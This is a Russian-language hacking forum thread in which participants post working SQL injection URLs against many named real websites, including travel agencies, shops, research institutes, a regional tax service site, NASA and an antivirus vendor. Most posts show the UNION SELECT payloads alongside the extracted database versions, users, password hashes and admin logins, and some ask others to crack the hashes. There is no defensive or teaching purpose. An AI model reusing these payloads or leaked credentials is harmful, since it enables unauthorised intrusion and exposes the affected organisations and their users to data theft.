SQL Инъекции

2 xcedz
www.dotfiles.com
баян
Замучали его бедного я раза три точно в этой ветке видел

 

Не парься, у всех бывает,а вообще :
google dotfiles.com site:forum.antichat.ru
7 ссылок

 

Code:

http://www.alparysoft.ru/products.php?id=10&item=0x2d3127%20union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*

4.1.22-log/wtalparysoftru/wtalparysoftru@localhost

 

прошелся по туроператорам:

BSIgroup:

_http://www.bsigroup.ru/outgoing/specs.php?id=-464+union+select+1,version(),3,4,user(),6,7,8,9,10,11,12,13,database(),15,16,17,18,19,20,21,22,23,24,25,26,27/*&action=getItem

5.0.22
bsigroup_out
bsigroup_newwww@localhost
--------------------------
ВОЯЖ-ЛЮКС:

_http://voyag-lux.ru/chapter7.html?uid=7&vacid=-3+union+select+1,2,AES_DECRYPT(AES_ENCRYPT(concat(version(),char(58),user(),char(5

8),database()),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

4.1.10:[email protected]:voyage

доступ к mysql.user

_http://voyag-lux.ru/chapter7.html?uid=7&vacid=-3+union+select+1,2,aes_decrypt(aes_encrypt(password,0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+mysql.user/*

18120c23686967de
1b873b97412ca664

блин как звать юзера не нашел спать пойду

 

admin:c5867aba18ac3f84c6ca96bdc3731ac0
avv:067026f0c6e2164684867a79f48dc9fb:avv
ceba:7da8dd069dfc3ed8c0b2294591c0f889:byaka
где админка не знаю
-----------------------------------------------------

elena:123
http://www.elenayavorskaya.ru/partners/adm/login.php

 

2 159932

elena:123
пароль отсюда:
_http://www.elenayavorskaya.ru/admin/

 

прочитай ВНИМАТЕЛЬНО ! я написал что пас не подходит а админку я написал !
теперь подходит .. странно - глюки были ..

 

2 159932
Помоему мы на разных языках
Твой аккаунт подходит СЮДА:
_http://www.elenayavorskaya.ru/admin/

 

Обратите внимание на счетчик сайта

http://www.theplace.ru/forum/message.php?id=-87910+union+select+1,2,3,concat(table_schema,0x3a,table_name,0x3a,column_name),5,6,7,8+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/*&top_id=87910

 

Code:

http://korea-dpr.com/users/russia/news/message.php?id=0x3127%20union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6/*

4.0.24_Debian-10-log/russia/russia@localhost

Code:

http://www.trueyoga.com/page.php?ID=0x313527%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6/*

4.0.27-max-log/tydbu/[email protected]

упс

 

http://www.classpad.org/details.php?id=-186+union+select+1,concat_ws(0x3a,customers_lastname,customers_password,customers_id),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+customers+limit+1,1/*&cat=5

Ппц ели додумалсо до это таблицы Ж(никогда бы ни подумал).Кому не лень,расшифруйте и скиньте в ЛС))))))))))))))))))))))))))))))))))))))))))))))))))))))))


Hallgren:6c7be71afc1a971cdc69e575fca701ec:02

 

2 Велемир limit+0,1 Denley:48b908cfdfea2575482eead693f6021f:7b:737
md5($salt.$password) если не ошибаюсь

ничего такого


ver 4.1.18
[email protected]

 

Шоп)
_http://www.visionsp.co.uk/shop.asp?navcatid=-11+UNION+ALL+ SELECT%20null

 

sunnyborder.com

HTML:

http://www.sunnyborder.com/pages/plant.php?id=290+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

L1v91n1@localhost:4.1.12-log:sunnyborder
----------------------------------------------------------
onestops.info

HTML:

http://www.onestops.info/category.php?cat_id=-10'+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2/*

onestops@localhost:4.1.19-standardnestops
----------------------------------------------------------
southphillyreview.com

HTML:

http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1)/*

philly_review@rp1:4.1.12-standardhilly_review_db

HTML:

http://southphillyreview.com/view_article.php?id=-6606+union+select+convert(concat(id,email)+using+latin1)+from+users/*

[email protected]
----------------------------------------------------------
idahosystemofcare.org

HTML:

http://www.idahosystemofcare.org/cal/month.php?cid=-3+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),3,4,5,6,7/*

[email protected]:4.1.20-log:dbidsoc

 

sony--ericsson
_http://www.sony-ericsson.ru/catalog/phone.php?fam=24&idmodel=-101+union+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*&idkey=2&idparent=4
4.1.22
sonyeric_old@localhost

 

Code:

http://www.99brands.com/products.php?category_id=-21+union+select+1,2+from+orders/*

Нашел таблы products, categories дальше влом ковырять... Шоп по продаже часов, кажись online там есть партнерская программа типо главмеда...

 

Прошёлся по институтам:
-----------------------------------
Институт Морской Геологии и Геофизики г. Южно-Сахалинск

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user(),version(),database()/*

root@localhost
4.0.18-log
site

_http://www.imgg.ru/rus/news.php?num=-1183099646'+union+select+1,user,password,4+from+mysql.user/*

root:059391cc0d366090
-------------------------------------
"Институт проблем предпринимательства" Питер
_http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,user(),version(),4,5/*

u12018@localhost
4.1.20

http://www.ippnou.ru/article.php?idarticle=-9999999+union+select+1,name,pass,4,5+from+admin/*

montana 6faa499662c77a0b

Кому не лень попробуйте через order подобрать столбцы от 1 до 6, не пойму почему такой вывод.Вот рабочий параметр:

_http://www.ippnou.ru/article.php?idarticle=000282
--------------------------------------

 

NASA и Dr.Web

Для любителей экстремального отдыха


NASA:

https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=-1'
https://msfcsma3.msfc.nasa.gov/dbwebs/apps/igc/help.php?id=3-1/**/or/**/1=@@version


Dr.Web:

http://old.antivir.ru/inf/virus.php?id=-31/**/union/**/select/**/1,2,3,4,5,6,7,8,9/*

к сведению

old.antivir.ru has address 81.176.66.227
Found 16 websites with the IP 81.176.66.227

1) adinf.com
2) adinf.ru
3) antigen.ru
4) antimonov.ru
5) antivir.ru
6) devicelock.ru
7) dialog-nauka.ru
8) dialognauka.com
9) dialognauka.ru
10) dials.ru
11) ftp.adinf.ru
12) ftp.antivir.ru
13) ftp.dialognauka.ru
14) ftp.dials.ru
15) new.antivir.ru
16) old.antivir.ru

interrus@localhost
virus
4.0.22-log

PS: "Данный файл был обнаружен где-то в недрах
гугла и по запросу, который уже никто не помнит )). Мы не можем быть признаны
ответственными за его распространение, так как он был найден через общедоступную
поисковую систему. Вы могли быть на нашем месте ))." // (c) defaced 3 //

 

Сайт управления федеральной налоговой службы по Брянской области =) :
http://www.r32.nalog.ru/index.php?topic='+union+select+1,2,3,4,5,6,7,8,9/*
p.s. по ходу дела отключен вывод ошибок

 

http://search.adslclub.ru/?show_dir=1&id=0&id_res=-6+union+select+1,2,3,4,5,6,7,8,9/*
Если кто-то сможет этим воспользоваться, напишите пожалуйста в личку)